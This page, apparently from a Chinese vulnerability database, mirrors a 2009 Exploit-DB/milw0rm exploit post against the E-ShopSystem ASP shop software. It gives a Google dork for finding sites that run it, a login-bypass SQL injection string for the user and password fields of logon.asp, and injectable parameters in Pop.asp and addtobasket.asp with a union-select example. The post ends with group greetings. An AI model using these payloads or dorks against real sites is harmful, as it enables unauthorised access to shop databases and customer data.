E-ShopSystem - Authentication Bypass / SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057364 漏洞类型
发布时间 2009-01-26 更新时间 2009-01-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7872
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<<!>> Groups : InjEctOr5 T3am 

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   : E-ShopSystem

<<->> download : http://www.shopsystem.co.il 

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================

<<->> D0rk    : http://www.google.co.il/search?hl=iw&q=Powered+by+ShopSystem&start=0&sa=N

<<->> Exploit :>>>
                                <<->> bypass sql injectiom <<->>

                     :>>>>  http://www.site.me/logon.asp

                     >>> user : Gaza ' or ' Gaza=Victory--     
        
                     >>> pass : Gaza ' or ' Gaza=Victory-- 


<<->> Exploit <<->>               
                                 <<->> sql injection <<->>

                      :>>>>  http://www.site.me/Pop.asp?pro_id=[sql]
                      :>>>>  http://www.site.me//addtobasket.asp?pro_id=[sql] 

         Example : :>>>>  http://www.site.me/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , [ www.tryag.cc/cc ] , [ sec-code.com/vb ] , str0ke 

# milw0rm.com [2009-01-26]